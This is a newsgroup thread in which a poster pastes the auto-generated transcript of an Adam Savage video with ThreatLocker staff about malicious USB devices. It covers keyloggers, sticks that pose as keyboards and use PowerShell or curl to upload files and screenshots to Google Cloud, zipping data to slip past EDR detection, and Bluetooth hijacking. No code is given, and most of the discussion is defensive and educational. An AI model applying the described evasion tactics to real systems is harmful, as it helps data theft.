On Wed, 4/8/2026 1:12 PM, Alan K. wrote:
On 4/8/26 11:43 AM, Mr. Man-wai Chang wrote:
On 4/8/2026 8:19 PM, J. P. Gilliver wrote:
Well, over 17 minutes to say don't plug in strange USB sticks (or things >>> that look like USB sticks/cables). Valid warning, but I've better things >>> to do than wait through that (so didn't).
The first half of the video can indeed be skipped... :)
Damn, that's the part I watched then gave up.ÿÿ Wouldn't that have been a nice piece of help in the original post?!!!
You can take those too-long Youtube videos
https://www.youtube.com/watch?v=OpcuqePIL7k
and run them through a transcript generator, to text form.
https://notegpt.io/youtube-transcript-generator
Use the copy button to place text in copy buffer.
Place into a new text editor window. In your favorite shell
fmt -w80 input.txt > output.txt # Makes it slightly easier to read
Another way to do this, is yt-dlp and capture the video,
then use dsnote to convert to text. Which might make a few
more errors in transcription along the way. You might resort
to this method, if any transcription service goes out of business.
At 00:09:25 we can see there is a change of pace of some sort.
00:09:25 ... Like, if you take apart this
************************************************************
00:00:00
So, you can go into the settings of your computer and say, "Don't
trust any USB drive." And this can get past that. >> This can get past that because it's not a USB drive. >> Hey everybody, Adam Savage here, and today we're going to talk about this, the humble USB key. When I go to conventions and events, I am sometimes given USB drives by fans who would love to share their work with me. And I totally get that. But I have to tell every single
one of them, I am never
00:00:24
plugging someone else's USB key into my
computer or anyone else's. You have no idea what could be on these. Worse
yet, the very act of plugging one in could initiate a malicious program on
your computer. We asked the security experts from Threat Locker to the cave
to share examples with us of malicious devices they have encountered in the field like this hacking hardware hidden inside an innocuous USB charging
cable. I'm so glad you are here because I pay a lot of attention to security, internet
00:00:59
security, uh encryption, the things that keep our data
safe because while we use computers almost every minute of every day, uh there are significant threats to our data and to our internet security that a lot of people aren't aware about. Aren't isn't that true? >> Absolutely. And they're getting worse every day. The attacks are increasing. >> Okay, so let's start
at the ground floor. What is the most bog standard uh threat vector that
most people might that your average person might
00:01:26
encounter? >>
Well, I I think the computer itself, >> right? Sure. >> Fair. So, and the operator. >> So, so if you think about this machine or your phone or anything else is so powerful um it can be used to do anything. It it can be used to video, record, xfill data, gain access to your bank accounts. And what that means is if an attacker can get any kind of into this machine, whether it's
a user or whether it's a physical device, >> they can now gain access to
not just
00:01:56
your computer, but everything you use your computer
for, which means your data, your bank account, your photos, your camera,
right? It's not just a productivity tool. It's a gateway to all of the
most important data of my life. >> Yeah. I mean, you're basically walking around with a nuclear bomb in your passport. >> And now I'm seeing here a
bunch of what look like innocuous USB keys. >> Yeah. And this is really this
is the cool part about breaking into computers
00:02:19
is when you get
something physical cuz of course you can you can send somebody an email and somebody can click on something and you you can gain access. But this is
where it gets really interesting because quite often people will think well this is a phone charger, right? >> How much damage can this cause me? This
is just a USB key. This is a USB key. How much damage can cause? But these actually are essentially the keys to that really dangerous tool. Well,
so there is this old meme that's been going
00:02:44
around forever,
which is that our phones have more computing power than the Apollo guidance computer. And I I updated that for myself about a decade ago cuz I realized your USB drive has more computing power than the Apollo guidance computer. And I think maybe this charging cable might be able to possess more computing
power than the Apollo guidance computer. Am I right? You could almost put a computer in here. >> Yeah, there is a mini computer in there. >> Some will
run Linux on it. You can run
00:03:11
Linux off of a charging cable. That
doesn't feel like anything is safe ever again. >> And I don't think there's Wi-Fi in the Apollo. So, so, uh, and that has Wi-Fi built right into it. >> Okay. So, I I I feel like will you walk me through some of the ways in which these can compromise your system. >> So, so this one here is most basic. And this one very very cheap, very, very easy. And essentially, when you plug
this into your computer, Yeah. You plug the keyboard into it and now it's
going
00:03:38
to record all of your keystrokes and then you can gain
access to those keystrokes. So if somebody was put this in your computer in your office in between your keyboard and your computer and then come back
a week later they could see everything you typed all your passwords every password every character every message you sent on your computer will now
be on here. >> Okay. And so that's that's why this is entry level because
it requires a physical uh installation and then a physical retrieval of the data.
00:04:04
Yes. Um, and also you get one shot of of getting what
you want. >> Right. Right. Right. Not it's not an ongoing threat. >> It's
not whereas these get a little bit more interesting because you can these can actually do things. And this this here essentially it's it looks like a USB drive. >> Um, if you block USB drives, it will not block it. Just to be clear, it you can completely block USB drives in your environment and it will not block it. >> So you can go into the settings of your
00:04:28
computer
and say don't trust any USB drive. And this can get past that. This can get passed up because it's not a USB drive. It's a USB device. And actually, I
was I was in an event and I I offered someone a free trip to Florida if this device couldn't exfill their data. And we had like 15 people line up trying
to get this free trip to Florida for zero trust world. And the first guy was like, I want he I'm using this advanced DDR. My CIS says it's impossible. We block USB
00:04:55
drives. And straight away, all his data just uploaded
to the internet. Um, and the reason being is because it it looks like a drive, but it actually presents as a keyboard. >> Oh, so the computer doesn't even think. So it's it's not even on the list of things it doesn't like. >> No,
it says, "Oh, someone just plugs the keyboard in. Let the keyboard send keystrokes to my computer." And that's what's super terrifying about this
one. Now, you when you plug this in, it can
00:05:18
pretty much type
anything you want. Now, it's only typing, so it can only do as much damage to you as your computer can. But again, your computer is this big weapon. So, we're going to use all of the tools in your machine to Xfill data or play
music loud or >> maybe open up an email, send the email to a secret account, send passwords and stuff like that. >> Yeah. And the the the the two examples
I like, and I know we got the Rick Roll as well, but the the first one
is um the
00:05:42
Rick Roll is really good for your kids at school,
though, if you want to do that. Uh but the the first one is you could you literally just iterate through their documents, use a a a program built
into Windows like PowerShell and just say I'm going to copy all of the files
up to the internet and it will just take their files. And the other one is
you can you just plug it in for 20 seconds. You take it out and it will now continuously take screenshots every 60 seconds. And we test >> it's putting
in a script. It's when it's
00:06:06
running in a script that runs it in
the background and it literally will take screenshots and upload them every every sing one of the leading endpoint detection solutions. Plugged it in, nothing, no alert, no anything. And for the next week, screenshots were just being uploaded to Google Cloud. >> Oh my gosh. I I have to say that ever
since I heard about what a threat this can be, and this is well more than a decade ago, I have never plugged any USB key. I did not purchase myself into
my machine.
00:06:38
Uh what what can people do against something like
if this is all of a sudden phoning home with all of your important data? How
do you protect against that? >> So I I think the the solution is you have
to constrain this, >> right? Because you can't you can't stop whether it's
this or whether it's a user downloading and running something. You can't stop mistakes being made in every possible area. So what you have to do is say, well, I accept that something bad
00:07:04
might try and happen, but
I've got all these programs on my computer. They can access everything,
all my data. Why don't we just take away every program that doesn't need
access to our data away? Why don't we take away access to the internet if
it doesn't need access to the internet? So suddenly these things don't, all they do is send keystrokes. So if they're going to open PowerShell or open
curl or open command prompts, which are just built-in tools in Windows,
if you block those tools
00:07:27
from seeing your programs using a
zero trust approach to security, it means yes, they'll run, but the damage
is basically nothing. >> So one of the ways in which these threat vectors
work is by exploiting the computer's desire to be easy to work with. >> Absolutely. >> It wants to do things when you plug things in. It wants to
run scripts and make it all get stuff ready for you so it's all there when
you need it. And what you're talking about is software that limits those permissions so that
00:07:54
they're doled out at a reasonable pace. Is
that right? >> What you need to do, it should be able to do and all of the tools that don't need access because most people don't realize that they've
got maybe three or 4 hundred programs on their computer, right? >> Uh because they think, well, I'm running Zoom, I'm running Office, I'm running Chrome,
but they don't realize that little Logitech Quick Cam support app, the all
the system tools like PowerShell
00:08:14
and curl, everything that's
built into Windows, all can be used against you. So if you just say, "Well,
I'm going to take away all those tools where they're not needed," it makes
an attacker's life much much more miserable. >> Now, do you guys is your
guys business model based on both a software model, but also training your clients about best practices and safe safe behaviors? >> Yeah. So training
the IT department I think what is our entire business uh if
00:08:38
you
like marketing strategy is about education to the IT department because we understand that you humans people users are going to make mistakes right
it's it's it doesn't matter how good you are how much you train them someone's going to make a mistake so >> so that's that's what this this pile here is you can't you can't keep one of these from entering your machine
right it's it's there's too many ways in which that can happen so you have
to deal with
00:09:02
the aftermath >> yeah stop someone is being able
to do something once they get onto your machine and take away privileges
where they're not required. And then it doesn't matter so much when your
users make mistakes. What we're doing is we're essentially putting crash barrier around your computer. It's like on the highway, you can't go into oncoming traffic and yeah, you can mess around a bit, dent up your car,
but you're not going to be able to cause massive damage.
00:09:25
All right. Now, I'm really curious about this. Like, if you take apart this, would you be able to under any circumstances tell if something nefarious had been added onto it? So in this case, this is specifically designed uh for bad purposes. So if you take if if you take this apart, it looks exactly like
that. And yes, I can see because there's a button here that puts me into attacker mode where I can program my payload, I can take this memory card
out and I can copy things to that. All
00:09:49
right. So while I have
uh uh maintained my security policy and not put unfamiliar USB drives in my computer, I am fascinated by what happens when that when that happens. Can we watch one of these do its nefarious thing? >> Absolutely. So, I've got two computers here. >> Yeah. >> Kieran here is my attacker. >> Yeah. Hacker. >> He's going to steal my data. And uh this here is the victim. >> That's the victim laptop. >> Okay. The USB comes with C and A. And it
00:10:14
doesn't
matter whether you're using Windows or Mac. You have to change the scripts around a little bit, but you can do it in both. >> Um and what I'm going to
do is I'm just going to plug this into the computer. >> Yeah. >> And it's
going to present as a keyboard. So, blocking USB drive is not going to do anything. Now, I've disabled the threat locker security software here. So,
it's going to get around uh everything be able to run. Oh. Is that command shell right there?
00:10:34
Yeah. And it's literally just running
PowerShell and now it's downloading data. >> Wow. >> And it's using legitimate software. Um I guess one of them was denied, but the rest of them seems to be >> No, because you don't have one drive on this computer. >> Okay. Oh, it's missing. Okay. So, look, you can see now that it's literally uploading our
data to the internet and it's picking this VH recovery ISO because it's huge, which is uh going to
00:10:59
be slow. And it's going to start uploading
all of these files uh to Google Cloud here. And the nice thing about this,
we we're doing two things. One is we're using Google. And the reason we're using Google cuz no S and no alerts going to trigger when you send data to Google because there's so much data going to and from Google all the time,
no one even blinks an eyelid. The the second thing we're going to do is um we're using sevenzip to compress everything together so we don't trigger
00:11:23
multiple files being uploaded. Two years ago, the script we had here
would upload each file one at a time. And it took about two years, but some
of the big antivirus and EDR companies started detecting all that mass upload as suspicious behavior. So, we just changed it. So, what it does, it zips it all up into one file, so they don't see uh this mass upload happening. Now,
I have heard stories about uh uh uh uh like convenience stores near important government facilities being seated with compromised USB drives so that some
00:11:56
contractor might buy one at the local 7-Eleven, plug it into
their computer, and malware starts to be >> trade shows, switching them
out. >> I mean, whenever you go to a conference and you just take it and
the worst thing is you take these USB drives from someone's desk, someone
could have gone and just swapped them on the table, >> right? because they
look like they're giveaways and it might not be the company themselves. You might say, "Well, I trust this company. They
00:12:15
wouldn't give me
a bad USB drive and but you go over, you go and go take one of the three
USB drives." All it took was someone to walk by and go, >> "Yeah, parking
lots. Very, very common." >> Parking lots. >> Parking lot. You drop five
of these in a parking lot, put payroll on them. >> Who who who finds a USB drive in a parking lot and plugs it in? Do you just eat food that you find
on the street? Do you chew gum from the subway? So, uh, it's you go and put something intriguing
00:12:40
enough on something. And actually, I know
of a police department where the head of cyber plugged in a device he found
and this I wonder why CYBER >> WHAT ARE YOU going to do against? >> Yeah. And now here's the thing though. You don't even need someone obviously I'm not going to plug something in and you're not going to plug something in. But
if you think about you got 100 employees in your company, it just takes
one. >> Yeah. one person and then you can gain access to the network. And
then once
00:13:09
you're on the network, you can start doing things
like slowly um uh switching files out on network shares and then you can
get access to another machine and it's very very easy to move around once
makes a mistake. >> So the window here where we're seeing everything that
the nefarious drive is doing, that's not a standard thing you see. You guys have put that up for visualization purposes. >> Yeah. Essentially, typically
if you were really trying to steal data, you drag it
00:13:31
out the
way so the user can't see it. It's in the background. you don't want it to happen. Or you can minimize it and let it run in the background. I like to
do that with the screen capture one where it'll take screenshots because it will just continuously take screenshots in the background. And you can make that persistent so it happens on restart or just until the user restarts their computer. >> Uh and of course the user shouldn't be able to see it when it's doing it. Uh
00:13:49
now we can see on this side all of our data is now
uploaded. We can see all of the used files >> just from plugging that in. >> Just from plugging that in. No touching the keyboard, no anything. >> Why is everybody using USB as like the most base level of a threat vector? So the reality is most of the attacks actually happen eially uh from just an email
run this command or because uh or one of the cool things we actually did I think two years ago was um we were doing this on a Mac and when I plugged
it in
00:14:16
it asked me what type of keyboard it was which kind of
slowed me down as an attacker. So I went off and I did what any responsible
CEO would do. I got half of our threat intelligence team to figure out how to get around it. In the meantime, they actually figured out how they could do
it through Bluetooth by intercepting the connection through AirPods and the
Mac and send the same keystroke. So, it doesn't have to be USB. USB is just nice and easy to do. >> So, so in every way that our computers
00:14:39
are talking to each other and their devices for convenience, those are places that your data can leak out and >> yeah, >> threat vectors can leak in >>
any input or output which could be Bluetooth, USB, internet. So you guys
have been able to do this kind of scripting using the Bluetooth of your
of of earbuds. >> Yeah, we literally and and it was quite an interesting webinar cuz our chief product officer loves Max. Like absolutely loves >>
well I mean they're very secure too.
00:15:06
They're famously >> that's
what he argued. So So we I had made a point of saying look it's just as bad
and we did the exact same thing. We xfilled all of his data. Uh, we managed to open during the webinar. It was a PG-13 website, but an inappropriate site and we got full control of his Mac, so we could literally do anything we wanted
on it persistently. >> Wow. >> Ju just by him. And we didn't even All he had
to do was pair his AirPods and we were able to intercept that connection.
00:15:35
Now, Apple did fix it after we we reported it to him. Um, they
kind of pushed it off at the beginning, but once we showed them what was
really happening, they did go off and fix it in the next month's build. >> Okay. Now you guys do this for companies. Can you give me some advice that
the viewers can take away about what each of us individuals can do about these kind of threats. What are what what are your best practices at home? >> So I
I I would say first of all I mean this is obvious. Don't plug things into
00:16:01
your computer that you didn't get. And also be a bit nice on your IT
guy when he says, "No, you can't have your own cheap keyboard that you just
so but so there's one part, but also just when you're getting emails, when you're getting calls from people, AI is so effective now at uh replicating voices. Don't just run things on your computer without validating them. Call your IT department on their number. Say, I've been asked to do this. Can you validate this?" Because most of these
00:16:29
ransomware attacks now,
it's because a user did something, opened something, downloaded something
from the internet they shouldn't have done. Every piece of software that you run on your computer can see every piece of data that's on your computer. And just remember, so when you're installing a game, it might not be a good even
if it's not a intentionally bad game, it might these guys aren't security engineers. They're writing games. So it's not that the game might compromise you, but the game might
00:16:55
compromise your ability to be secure. >>
Yes. >> So only run what you need to run on a machine that you have access to critical data. If you want a game, go and get another machine, play the games on that machine. Don't log into your banking account and make anything any there's no such thing as a free product. Anything you're downloading free, just think about that. >> Copy that. Guys, thank you so much. This has been such
an education and I have long wanted to see evil USB keys. Thank
00:17:21
you for showing me how they do their evil deeds. >> You're welcome.
************************************************************
Paul
--- PyGate Linux v1.5.13
* Origin: Dragon's Lair, PyGate NNTP<>Fido Gate (3:633/10)